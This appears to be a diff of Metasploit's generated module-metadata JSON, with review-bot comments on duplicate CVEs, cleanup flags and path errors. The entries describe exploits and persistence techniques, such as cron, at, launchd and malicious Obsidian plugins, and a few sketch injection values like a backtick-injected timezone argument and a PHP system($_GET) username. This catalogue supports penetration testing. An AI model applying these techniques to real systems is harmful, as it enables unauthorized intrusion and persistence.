"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/misc/erlang_cookie_rce.rb",
"is_install_path": true,
"ref_name": "multi/misc/erlang_cookie_rce",
@@ -123092,6 +123982,7 @@
],
"description": "This module uses the FreeSWITCH event socket interface\n to execute system commands using the `system` API command.\n\n The event socket service is enabled by default and listens\n on TCP port 8021 on the local network interface.\n\n This module has been tested successfully on FreeSWITCH versions:\n\n 1.6.10-17-726448d~44bit on FreeSWITCH-Deb8-TechPreview virtual machine;\n 1.8.4~64bit on Ubuntu 19.04 (x64); and\n 1.10.1~64bit on Windows 7 SP1 (EN) (x64).",
"references": [
"CVE-2019-19492",
"CWE-260",
"URL-https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket"
],
@@ -123107,7 +123998,7 @@
"Windows (In-Memory)",
"Windows (Dropper)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/freeswitch_event_socket_cmd_exec",
@@ -124211,6 +125102,7 @@
],
"description": "This module uses QEMU's Monitor Human Monitor Interface (HMP)\n TCP server to execute system commands using the `migrate` command.\n\n This module has been tested successfully on QEMU version 6.2.0\n on Ubuntu 20.04.",
"references": [
"CVE-2019-12928",
"URL-https://wiki.qemu.org/ToDo/HMP",
"URL-https://www.qemu.org/docs/master/system/monitor.html",
"URL-https://www.qemu.org/docs/master/system/security.html",
@@ -124226,7 +125118,7 @@
"Unix (Command)",
"Linux (Dropper)"
],
"mod_time": "2022-02-07 17:48:27 +0000",
"mod_time": "2025-10-07 14:03:32 +0000",
"path": "/modules/exploits/multi/misc/qemu_monitor_hmp_migrate_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/qemu_monitor_hmp_migrate_cmd_exec",
@@ -124623,7 +125515,7 @@
"Windows",
"Unix"
],
"mod_time": "2023-04-06 15:42:39 +0000",
"mod_time": "2025-09-23 09:58:50 +0000",
"path": "/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize_badattr_extcomp",
@@ -124672,7 +125564,7 @@
"Windows",
"Unix"
],
"mod_time": "2023-04-06 11:43:50 +0000",
"mod_time": "2025-09-23 09:58:50 +0000",
"path": "/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize_badattrval",
@@ -125134,6 +126026,225 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/persistence/at": {
"name": "at(1) Persistence",
"fullname": "exploit/multi/persistence/at",
"aliases": [
"exploits/unix/local/at_persistence"
],
"rank": 600,
"disclosure_date": "1997-01-01",
"type": "exploit",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module executes a metasploit payload utilizing at(1) to execute jobs at a specific time. It should work out of the box\n with any UNIX-like operating system with atd running.\n Verified on Kali linux and OSX 13.7.4",
"references": [
"URL-https://linux.die.net/man/1/at",
"URL-https://www.geeksforgeeks.org/at-command-in-linux-with-examples/",
"ATT&CK-T1053.002",
"ATT&CK-T1053.001"
],
"platform": "Linux,OSX,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2025-09-06 15:12:16 +0000",
"path": "/modules/exploits/multi/persistence/at.rb",
"is_install_path": true,
"ref_name": "multi/persistence/at",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session",
"event-dependent"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"meterpreter",
"shell"
],
"needs_cleanup": true,
"actions": []
},
"exploit_multi/persistence/cron": {
"name": "Cron Persistence",
"fullname": "exploit/multi/persistence/cron",
"aliases": [
"exploits/linux/local/cron_persistence"
],
"rank": 600,
"disclosure_date": "1979-07-01",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will create a cron or crontab entry to execute a payload.\n The module includes the ability to automatically clean up those entries to prevent multiple executions.\n syslog will get a copy of the cron entry.\n Verified on Ubuntu 22.04.1, MacOS 13.7.4",
"references": [
"ATT&CK-T1053.003"
],
"platform": "Linux,OSX,Unix",
"arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Cron",
"User Crontab",
"OSX User Crontab",
"System Crontab"
],
"mod_time": "2025-09-18 11:48:17 +0000",
"path": "/modules/exploits/multi/persistence/cron.rb",
"is_install_path": true,
"ref_name": "multi/persistence/cron",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": true,
"actions": []
},
"exploit_multi/persistence/obsidian_plugin": {
"name": "Obsidian Plugin Persistence",
"fullname": "exploit/multi/persistence/obsidian_plugin",
"aliases": [
"exploits/multi/local/obsidian_plugin_persistence"
],
"rank": 600,
"disclosure_date": "2022-09-16",
"type": "exploit",
"author": [
"h00die",
"Thomas Byrne"
],
"description": "This module searches for Obsidian vaults for a user, and uploads a malicious\n community plugin to the vault. The vaults must be opened with community\n plugins enabled (NOT restricted mode), but the plugin will be enabled\n automatically.\n\n Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.",
"references": [
"URL-https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin",
"URL-https://github.com/obsidianmd/obsidian-sample-plugin/tree/master",
"URL-https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491",
"URL-https://help.obsidian.md/Extending+Obsidian/Plugin+security",
"URL-https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/"
],
"platform": "Linux,OSX,Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Auto",
"Linux",
"OSX",
"Windows"
],
"mod_time": "2025-09-06 15:05:21 +0000",
"path": "/modules/exploits/multi/persistence/obsidian_plugin.rb",
"is_install_path": true,
"ref_name": "multi/persistence/obsidian_plugin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_multi/persistence/periodic_script": {
"name": "Periodic Script Persistence",
"fullname": "exploit/multi/persistence/periodic_script",
"aliases": [
"exploits/multi/local/periodic_script_persistence"
],
"rank": 600,
"disclosure_date": "2012-04-01",
"type": "exploit",
"author": [
"gardnerapp",
"msutovsky-r7"
],
"description": "This module will achieve persistence by writing a script to the /etc/periodic directory.\n According to The Art of Mac Malware no such malware species persist in this manner (2024).\n This payload requires root privileges to run. This module can be run on BSD, OSX or Arch Linux.",
"references": [],
"platform": "BSD,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"OSX",
"Python",
"Unix",
"Bsd"
],
"mod_time": "2025-10-13 19:54:05 +0000",
"path": "/modules/exploits/multi/persistence/periodic_script.rb",
"is_install_path": true,
"ref_name": "multi/persistence/periodic_script",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_multi/php/ignition_laravel_debug_rce": {
"name": "Unauthenticated remote code execution in Ignition",
"fullname": "exploit/multi/php/ignition_laravel_debug_rce",
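Review bot: the new periodic_script entry is internally inconsistent: its description says the module can be run on BSD, OSX or Arch Linux, but "platform" is "BSD,OSX,Unix" and the targets ("OSX", "Python", "Unix", "Bsd") contain no Linux target, while the "Bsd" target name does not match the "BSD" platform spelling. Its "references" array is also empty even though the description cites The Art of Mac Malware (2024); the launch_plist entry in this same change links the taomm.org persistence chapter, which fits here too. Finally, obsidian_plugin and periodic_script leave "needs_cleanup": null while declaring "artifacts-on-disk" side effects, whereas the at and cron entries in this hunk set it to true; confirm whether those two modules implement cleanup and set the flag explicitly rather than leaving it unknown.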
@@ -127261,6 +128372,7 @@
],
"description": "This module exploits an unauthenticated remote code execution vulnerability in\n Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint.\n When authentication is disabled on the target system, it allows attackers to execute\n arbitrary AppleScript commands, which can include shell commands via `do shell script`.\n All versions up to 2025.7 (including patch versions) are vulnerable.",
"references": [
"CVE-2025-34089",
"PACKETSTORM-195347"
],
"platform": "OSX,Unix",
@@ -127284,7 +128396,7 @@
"targets": [
"Auto"
],
"mod_time": "2025-06-08 15:36:37 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/osx/http/remote_for_mac_rce.rb",
"is_install_path": true,
"ref_name": "osx/http/remote_for_mac_rce",
@@ -127704,56 +128816,6 @@
"needs_cleanup": true,
"actions": []
},
"exploit_osx/local/persistence": {
"name": "Mac OS X Persistent Payload Installer",
"fullname": "exploit/osx/local/persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "2012-04-01",
"type": "exploit",
"author": [
"Marcin 'Icewall' Noga <marcin@icewall.pl>",
"joev <joev@metasploit.com>"
],
"description": "This module provides a persistent boot payload by creating a launch item, which can be\n a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered\n upon login by a plist entry in ~/Library/LaunchAgents. LaunchDaemons run with\n elevated privilleges, and are launched before user login by a plist entry in the ~/Library/LaunchDaemons directory.\n In either case the plist entry specifies an executable that will be run before or at login.",
"references": [],
"platform": "OSX,Python,Unix",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Mac OS X x64 (Native Payload)",
"Mac OS X x86 (Native Payload for 10.14 and earlier)",
"Mac OS X Apple Sillicon",
"Python payload",
"Command payload"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/osx/local/persistence.rb",
"is_install_path": true,
"ref_name": "osx/local/persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"unknown-reliability"
],
"Stability": [
"unknown-stability"
],
"SideEffects": [
"unknown-side-effects"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_osx/local/root_no_password": {
"name": "Mac OS X Root Privilege Escalation",
"fullname": "exploit/osx/local/root_no_password",
@@ -128435,6 +129497,7 @@
],
"description": "This module exploits a buffer overflow in the IRC client component\n of UFO: Alien Invasion 2.2.1.",
"references": [
"CVE-2009-10006",
"OSVDB-65689",
"EDB-14013"
],
@@ -128446,7 +129509,7 @@
"targets": [
"Mac OS X 10.5.8 x86, UFOAI 2.2.1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/osx/misc/ufo_ai.rb",
"is_install_path": true,
"ref_name": "osx/misc/ufo_ai",
@@ -128467,6 +129530,65 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_osx/persistence/launch_plist": {
"name": "Mac OS X Persistent Payload Installer",
"fullname": "exploit/osx/persistence/launch_plist",
"aliases": [
"exploits/osx/local/persistence"
],
"rank": 600,
"disclosure_date": "2012-04-01",
"type": "exploit",
"author": [
"Marcin 'Icewall' Noga <marcin@icewall.pl>",
"joev <joev@metasploit.com>"
],
"description": "This module provides a persistent boot payload by creating a launch item, which can be\n a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered\n upon login by a plist entry in ~/Library/LaunchAgents. LaunchDaemons run with\n elevated privilleges, and are launched before user login by a plist entry in the ~/Library/LaunchDaemons directory.\n In either case the plist entry specifies an executable that will be run before or at login.\n\n Verified on OSX 11.7.10 (Big Sur)",
"references": [
"URL-https://taomm.org/vol1/pdfs/CH%202%20Persistence.pdf",
"URL-https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html",
"ATT&CK-T1647"
],
"platform": "OSX,Python,Unix",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Mac OS X x64 (Native Payload)",
"Mac OS X x86 (Native Payload for 10.14 and earlier)",
"Mac OS X Apple Sillicon",
"Python payload",
"Command payload"
],
"mod_time": "2025-09-23 16:59:26 +0000",
"path": "/modules/exploits/osx/persistence/launch_plist.rb",
"is_install_path": true,
"ref_name": "osx/persistence/launch_plist",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes",
"screen-effects"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_osx/rtsp/quicktime_rtsp_content_type": {
"name": "MacOS X QuickTime RTSP Content-Type Overflow",
"fullname": "exploit/osx/rtsp/quicktime_rtsp_content_type",
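Review bot: the description in this entry says LaunchDaemons are registered "by a plist entry in the ~/Library/LaunchDaemons directory", which contradicts the same sentence's claim that they run with elevated privileges before user login; a per-user ~/Library path cannot be loaded before any user has logged in, so this should read /Library/LaunchDaemons (the ~/Library/LaunchAgents path given for per-user agents is correct). The entry also carries over the misspellings "privilleges" (description) and "Apple Sillicon" (targets) from the removed osx/local/persistence entry; since this file is generated from module metadata, fix them in launch_plist.rb so the next automatic update picks them up.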
@@ -129857,6 +130979,7 @@
],
"description": "This module exploits a malicious backdoor that was added to the\n ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]\n archive between November 28th 2010 and 2nd December 2010.",
"references": [
"CVE-2010-20103",
"OSVDB-69562",
"BID-45150"
],
@@ -129873,7 +130996,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/ftp/proftpd_133c_backdoor",
@@ -129967,6 +131090,7 @@
],
"description": "This module exploits a malicious backdoor that was added to the\tVSFTPD download\n archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between\n June 30th 2011 and July 1st 2011 according to the most recent information\n available. This backdoor was removed on July 3rd 2011.",
"references": [
"CVE-2011-2523",
"OSVDB-73573",
"URL-http://pastebin.com/AetT9sS5",
"URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html"
@@ -129979,7 +131103,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb",
"is_install_path": true,
"ref_name": "unix/ftp/vsftpd_234_backdoor",
@@ -130073,6 +131197,7 @@
],
"description": "This module exploits the ContentKeeper Web Appliance. Versions prior\n to 125.10 are affected. This module exploits a combination of weaknesses\n to enable remote command execution as the Apache user. By setting\n SkipEscalation to false, this module will attempt to setuid the bash shell.",
"references": [
"CVE-2009-20011",
"OSVDB-54551",
"OSVDB-54552",
"URL-http://www.aushack.com/200904-contentkeeper.txt"
@@ -130085,7 +131210,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/http/contentkeeperweb_mimencode.rb",
"is_install_path": true,
"ref_name": "unix/http/contentkeeperweb_mimencode",
@@ -130176,6 +131301,7 @@
],
"description": "This module exploits a file upload vulnerability in Kace K1000\n versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547\n which allows unauthenticated users to execute arbitrary commands\n under the context of the 'www' user.\n\n This module also abuses the 'KSudoClient::RunCommandWait' function\n to gain root privileges.\n\n This module has been tested successfully with Dell KACE K1000\n version 5.3.",
"references": [
"CVE-2014-125113",
"URL-http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html"
],
"platform": "Unix",
@@ -130199,7 +131325,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/http/dell_kace_k1000_upload.rb",
"is_install_path": true,
"ref_name": "unix/http/dell_kace_k1000_upload",
@@ -130394,6 +131520,66 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_unix/http/freepbx_unauth_sqli_to_rce": {
"name": "FreePBX ajax.php unauthenticated SQLi to RCE",
"fullname": "exploit/unix/http/freepbx_unauth_sqli_to_rce",
"aliases": [],
"rank": 600,
"disclosure_date": "2025-08-28",
"type": "exploit",
"author": [
"Echo_Slow",
"Piotr Bazydlo",
"Sonny"
],
"description": "This module exploits an unauthenticated SQL injection flaw in FreePBX prior to versions 15.0.66, 16.0.89,\n and 17.0.3. The vulnerability lies in the /admin/ajax.php endpoint, which is accessible without\n authentication. Additionally, the database user created by FreePBX can schedule cronjobs, allowing\n remote code execution on the target system.",
"references": [
"CVE-2025-57819",
"URL-https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/"
],
"platform": "Linux",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command"
],
"mod_time": "2025-10-20 14:29:19 +0000",
"path": "/modules/exploits/unix/http/freepbx_unauth_sqli_to_rce.rb",
"is_install_path": true,
"ref_name": "unix/http/freepbx_unauth_sqli_to_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_unix/http/laravel_token_unserialize_exec": {
"name": "PHP Laravel Framework token Unserialize Remote Command Execution",
"fullname": "exploit/unix/http/laravel_token_unserialize_exec",
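Review bot: "needs_cleanup" is null in this freepbx_unauth_sqli_to_rce entry even though the description says code execution is obtained by having the FreePBX database user schedule cronjobs and SideEffects lists "artifacts-on-disk"; confirm whether the module removes the scheduled job after the payload runs and set the flag to true or false explicitly, as the cron and at persistence entries elsewhere in this change do.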
@@ -130526,6 +131712,7 @@
],
"description": "Maltrail is a malicious traffic detection system, utilizing publicly\n available blacklists containing malicious and/or generally suspicious trails.\n The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.\n The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains\n a command injection vulnerability in the `params.get(\"username\")` parameter.\n An attacker can exploit this vulnerability by injecting arbitrary OS commands\n into the username parameter. The injected commands will be executed with the\n privileges of the running process. This vulnerability can be exploited remotely\n without authentication.\n\n Successfully tested against Maltrail versions 0.52 and 0.53.",
"references": [
"CVE-2025-34073",
"EDB-51676",
"CVE-2025-34073",
"URL-https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/",
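Review bot: "CVE-2025-34073" now appears twice in this references list (the newly added first entry and the pre-existing entry after "EDB-51676"); drop one so the array stays unique, and check the module's References block for the same duplicate since this file is generated from it.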
@@ -130553,7 +131740,7 @@
"Unix Command",
"Linux Dropper"
],
"mod_time": "2025-07-03 14:07:14 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/http/maltrail_rce.rb",
"is_install_path": true,
"ref_name": "unix/http/maltrail_rce",
@@ -130809,6 +131996,7 @@
],
"description": "pfSense, a free BSD based open source firewall distribution,\n version <= 2.3.1_1 contains a remote command execution\n vulnerability post authentication in the system_groupmanager.php page.\n Verified against 2.2.6 and 2.3.",
"references": [
"CVE-2016-10709",
"EDB-43128",
"URL-https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc"
],
@@ -130833,7 +132021,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/http/pfsense_group_member_exec.rb",
"is_install_path": true,
"ref_name": "unix/http/pfsense_group_member_exec",
@@ -131051,6 +132239,7 @@
],
"description": "This exploits a command execution vulnerability in Pi-Hole <= 3.3.\n When adding a new domain to the whitelist, it is possible to chain\n a command to the domain that is run on the OS.",
"references": [
"CVE-2025-34087",
"URL-https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns"
],
"platform": "Linux",
@@ -131074,7 +132263,7 @@
"targets": [
"Automatic Target"
],
"mod_time": "2022-10-03 19:50:04 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/http/pihole_whitelist_exec.rb",
"is_install_path": true,
"ref_name": "unix/http/pihole_whitelist_exec",
@@ -131565,6 +132754,7 @@
],
"description": "Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.\n This allows the attacker to execute arbitrary php code as the context of the web user.",
"references": [
"CVE-2015-10141",
"URL-https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/",
"URL-http://web.archive.org/web/20231226215418/https://paper.seebug.org/397/"
],
@@ -131589,7 +132779,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/http/xdebug_unauth_exec.rb",
"is_install_path": true,
"ref_name": "unix/http/xdebug_unauth_exec",
@@ -131712,49 +132902,6 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_unix/local/at_persistence": {
"name": "at(1) Persistence",
"fullname": "exploit/unix/local/at_persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "1997-01-01",
"type": "exploit",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module achieves persistence by executing payloads via at(1).",
"references": [],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Automatic"
],
"mod_time": "2023-02-05 15:45:30 +0000",
"path": "/modules/exploits/unix/local/at_persistence.rb",
"is_install_path": true,
"ref_name": "unix/local/at_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [],
"needs_cleanup": true,
"actions": []
},
"exploit_unix/local/chkrootkit": {
"name": "Chkrootkit Local Privilege Escalation",
"fullname": "exploit/unix/local/chkrootkit",
@@ -132111,6 +133258,7 @@
],
"description": "The login component of the Polycom Command Shell on Polycom HDX\n video endpoints, running software versions 3.0.5 and earlier,\n is vulnerable to an authorization bypass when simultaneous\n connections are made to the service, allowing remote network\n attackers to gain access to a sandboxed telnet prompt without\n authentication. Versions prior to 3.0.4 contain OS command\n injection in the ping command which can be used to execute\n arbitrary commands as root.",
"references": [
"CVE-2012-6610",
"URL-http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf",
"URL-http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html",
"EDB-24494"
@@ -132123,7 +133271,7 @@
"targets": [
"Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/misc/polycom_hdx_auth_bypass.rb",
"is_install_path": true,
"ref_name": "unix/misc/polycom_hdx_auth_bypass",
@@ -132159,6 +133307,7 @@
],
"description": "Within Polycom command shell, a command execution flaw exists in\n lan traceroute, one of the dev commands, which allows for an\n attacker to execute arbitrary payloads with telnet or openssl.",
"references": [
"CVE-2025-34093",
"URL-https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/"
],
"platform": "Unix",
@@ -132169,7 +133318,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/polycom_hdx_traceroute_exec",
@@ -132614,6 +133763,7 @@
],
"description": "This module exploits a vulnerability in SonicWall Global\n Management System Virtual Appliance versions 8.1 (Build 8110.1197)\n and below. This virtual appliance can be downloaded from\n http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a\n holistic way to manage your entire network security environment.'\n\n These vulnerable versions (8.1 Build 8110.1197 and below) do not\n prevent unauthenticated, external entities from making XML-RPC\n requests to port 21009 of the virtual app. After the XML-RPC call\n is made, a shell script is called like so:\n 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.",
"references": [
"CVE-2014-8420",
"URL-https://www.digitaldefense.com/digital-defense/vrt-discoveries/",
"URL-https://slides.com/kernelsmith/bsidesaustin2018/#/"
],
@@ -132638,7 +133788,7 @@
"targets": [
"SonicWall Global Management System Virtual Appliance"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb",
"is_install_path": true,
"ref_name": "unix/sonicwall/sonicwall_xmlrpc_rce",
@@ -132716,6 +133866,7 @@
],
"description": "This module exploits a default hardcoded private SSH key or default hardcoded\n login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made\n by Array Networks. After logged in as the unprivileged user, it's possible to modify\n the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code.\n Execution is possible by using the backend tool, running setuid, to turn the debug\n monitoring on. This makes it possible to trigger a payload with root privileges.",
"references": [
"CVE-2014-125121",
"OSVDB-104652",
"OSVDB-104653",
"OSVDB-104654",
@@ -132729,7 +133880,7 @@
"targets": [
"vAPV 8.3.2.17 / vxAG 9.2.0.34"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb",
"is_install_path": true,
"ref_name": "unix/ssh/array_vxag_vapv_privkey_privesc",
@@ -132930,6 +134081,7 @@
],
"description": "This module exploits a command injection in Ajenti == 2.1.31.\n By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.",
"references": [
"CVE-2019-25066",
"EDB-47497"
],
"platform": "Python",
@@ -132953,7 +134105,7 @@
"targets": [
"Ajenti == 2.1.31"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/ajenti_auth_username_cmd_injection.rb",
"is_install_path": true,
"ref_name": "unix/webapp/ajenti_auth_username_cmd_injection",
@@ -133402,6 +134554,7 @@
],
"description": "This module exploits multiple vulnerabilities in Bolt CMS version 3.7.0\n and 3.6.* in order to execute arbitrary commands as the user running Bolt.\n\n This module first takes advantage of a vulnerability that allows an\n authenticated user to change the username in /bolt/profile to a PHP\n `system($_GET[\"\"])` variable. Next, the module obtains a list of tokens\n from `/async/browse/cache/.sessions` and uses these to create files with\n the blacklisted `.php` extention via HTTP POST requests to\n `/async/folder/rename`. For each created file, the module checks the HTTP\n response for evidence that the file can be used to execute arbitrary\n commands via the created PHP $_GET variable. If the response is negative,\n the file is deleted, otherwise the payload is executed via an HTTP\n get request in this format: `/files/<rogue_PHP_file>?<$_GET_var>=<payload>`\n\n Valid credentials for a Bolt CMS user are required. This module has been\n successfully tested against Bolt CMS 3.7.0 running on CentOS 7.",
"references": [
"CVE-2025-34086",
"EDB-48296",
"URL-https://github.com/bolt/bolt/releases/tag/3.7.1"
],
@@ -133428,7 +134581,7 @@
"Linux (x64)",
"Linux (cmd)"
],
"mod_time": "2023-03-13 10:31:27 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/bolt_authenticated_rce.rb",
"is_install_path": true,
"ref_name": "unix/webapp/bolt_authenticated_rce",
@@ -133526,6 +134679,7 @@
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to\n 0.8.6-d are vulnerable.",
"references": [
"CVE-2005-10004",
"OSVDB-17539",
"BID-14042"
],
@@ -133550,7 +134704,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/cacti_graphimage_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/cacti_graphimage_exec",
@@ -133762,6 +134916,7 @@
],
"description": "This module exploits a vulnerability found in ClipBucket version 2.6 and lower.\n The script \"/admin_area/charts/ofc-library/ofc_upload_image.php\" can be used to\n upload arbitrary code without any authentication. This module has been tested\n on version 2.6 on CentOS 5.9 32-bit.",
"references": [
"CVE-2013-10040",
"PACKETSTORM-123480"
],
"platform": "PHP",
@@ -133785,7 +134940,7 @@
"targets": [
"Clipbucket 2.6"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/unix/webapp/clipbucket_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/clipbucket_upload_exec",
@@ -134021,6 +135176,7 @@
],
